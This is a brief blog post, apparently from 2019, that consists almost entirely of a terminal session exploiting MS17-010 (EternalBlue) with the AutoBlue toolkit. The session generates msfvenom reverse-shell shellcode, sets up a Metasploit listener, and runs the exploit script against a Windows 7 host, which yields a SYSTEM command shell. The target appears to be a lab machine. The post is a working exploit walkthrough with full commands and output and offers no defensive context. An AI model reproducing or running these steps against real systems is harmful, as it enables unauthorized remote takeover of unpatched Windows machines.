Friday, August 16, 2019

autoblue is better than msfconsole sometimes

 root@kali# git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git        
 Cloning into 'AutoBlue-MS17-010'...                         
 remote: Enumerating objects: 1, done.                                     
 remote: Counting objects: 100% (1/1), done.                        
 remote: Total 72 (delta 0), reused 0 (delta 0), pack-reused 71  
 Unpacking objects: 100% (72/72), done.  
   
 root@kali# ./shell_prep.sh           
          _.-;;-._                            
      '-..-'|  ||  |                            
      '-..-'|_.-;;-._|                            
      '-..-'|  ||  |                              
      '-..-'|_.-''-._|                            
 Eternal Blue Windows Shellcode Compiler                     
                                          
 Let's compile them windoos shellcodezzz                     
                                          
 Compiling x64 kernel shellcode                                     
 Compiling x86 kernel shellcode                            
 kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)  
 Y                             
 LHOST for reverse connection:                       
 10.254.1.47                          
 LPORT you want x64 to listen on:                
 443  
 LPORT you want x86 to listen on:  
 445  
 Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell  
 1                          
 Type 0 to generate a staged payload or 1 to generate a stageless payload  
 1                      
 Generating x64 cmd shell (stageless)...    
   
 msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.254.1.47 LPORT=443  
 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload  
 [-] No arch selected, selecting arch: x64 from the payload  
 No encoder or badchars specified, outputting raw payload  
 Payload size: 460 bytes  
 Saved as: sc_x64_msf.bin  
   
 Generating x86 cmd shell (stageless)...  
   
 msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.254.1.47 LPORT=445  
 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload  
 [-] No arch selected, selecting arch: x86 from the payload  
 No encoder or badchars specified, outputting raw payload  
 Payload size: 324 bytes  
 Saved as: sc_x86_msf.bin  
   
 MERGING SHELLCODE WOOOO!!!  
 DONE  
   
 root@kali# ./listener_prep.sh  
  __  
  /,-  
  ||)  
  \\_, )  
   `--'  
 Enternal Blue Metasploit Listener  
   
 LHOST for reverse connection:  
 10.254.1.47  
 LPORT for x64 reverse connection:  
 443  
 LPORT for x86 reverse connection:  
 445  
 Enter 0 for meterpreter shell or 1 for regular cmd shell:  
 1  
 Type 0 if this is a staged payload or 1 if it is for a stageless payload  
 1  
 Starting listener (stageless)...  
 [ ok ] Starting postgresql (via systemctl): postgresql.service.  
   
   
 MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
 MMMMMMMMMMM        MMMMMMMMMM  
 MMMN$              vMMMM  
 MMMNl MMMMM       MMMMM JMMMM  
 MMMNl MMMMMMMN    NMMMMMMM JMMMM  
 MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM  
 MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM  
 MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM  
 MMMNI MMMMM  MMMMMMM  MMMMM jMMMM  
 MMMNI MMMMM  MMMMMMM  MMMMM jMMMM  
 MMMNI MMMNM  MMMMMMM  MMMMM jMMMM  
 MMMNI WMMMM  MMMMMMM  MMMM# JMMMM  
 MMMMR ?MMNM       MMMMM .dMMMM  
 MMMMNm `?MMM       MMMM` dMMMMM  
 MMMMMMN ?MM       MM? NMMMMMN  
 MMMMMMMMNe         JMMMMMNMMM  
 MMMMMMMMMMNm,      eMMMMMNMMNMM  
 MMMMNNMNMMMMMNx    MMMMMMNMMNMMNM  
 MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM  
     https://metasploit.com  
   
   
     =[ metasploit v5.0.6-dev              ]  
 + -- --=[ 1857 exploits - 1055 auxiliary - 327 post    ]  
 + -- --=[ 546 payloads - 44 encoders - 10 nops      ]  
 + -- --=[ 2 evasion                    ]  
   
 [*] Processing config.rc for ERB directives.  
 resource (config.rc)> use exploit/multi/handler  
 resource (config.rc)> set PAYLOAD windows/x64/shell_reverse_tcp  
 PAYLOAD => windows/x64/shell_reverse_tcp  
 resource (config.rc)> set LHOST 10.254.1.47  
 LHOST => 10.254.1.47  
 resource (config.rc)> set LPORT 443  
 LPORT => 443  
 resource (config.rc)> set ExitOnSession false  
 ExitOnSession => false  
 resource (config.rc)> set EXITFUNC thread  
 EXITFUNC => thread  
 resource (config.rc)> exploit -j  
 [*] Exploit running as background job 0.  
 [*] Exploit completed, but no session was created.  
 resource (config.rc)> set PAYLOAD windows/shell/reverse_tcp  
 [*] Started reverse TCP handler on 10.254.1.47:443  
 PAYLOAD => windows/shell/reverse_tcp  
 resource (config.rc)> set LPORT 445  
 LPORT => 445  
 resource (config.rc)> exploit -j  
 [*] Exploit running as background job 1.  
 [*] Exploit completed, but no session was created.  
 [*] Starting persistent handler(s)...  
   
 [*] Started reverse TCP handler on 10.254.1.47:445  
 msf5 exploit(multi/handler) >   
   
 root@kali# python eternalblue_exploit7.py 10.1.1.13 shellcode/sc_all.bin  
 shellcode size: 2203  
 numGroomConn: 13  
 Target OS: Windows 7 Professional 7601 Service Pack 1  
 SMB1 session setup allocate nonpaged pool success  
 SMB1 session setup allocate nonpaged pool success  
 good response status: INVALID_PARAMETER  
 done  
 root@kali# python eternalblue_exploit7.py 10.1.1.13 shellcode/sc_all.bin  
 shellcode size: 2203  
 numGroomConn: 13  
 Target OS: Windows 7 Professional 7601 Service Pack 1  
 SMB1 session setup allocate nonpaged pool success  
 SMB1 session setup allocate nonpaged pool success  
 good response status: INVALID_PARAMETER  
 done  
   
 [*] Encoded stage with x86/shikata_ga_nai  
 [*] Sending encoded stage (267 bytes) to 10.1.1.13  
 [*] Command shell session 1 opened (10.254.1.47:445 -> 10.1.1.13:49173) at 2019-02-21 13:28:21 -0500  
   
 msf5 exploit(multi/handler) > sessions  
   
 Active sessions  
 ===============  
   
  Id Name Type        Information                                    Connection  
  -- ---- ----        -----------                                    ----------  
  1     shell x86/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.254.1.47:445 -> 10.1.1.13:49173 (10.1.1.13)  
   
 msf5 exploit(multi/handler) > sessions -i 1  
 [*] Starting interaction with 1...  
   
 More?  
 SR<@p  f%_?Mg??:6Zdx8}}(ks-cx_JwD`c@MWH?l hp6  
 The system cannot find the file specified.  
   
 C:\Windows\system32>whoami  
 whoami  
 nt authority\system  

No comments: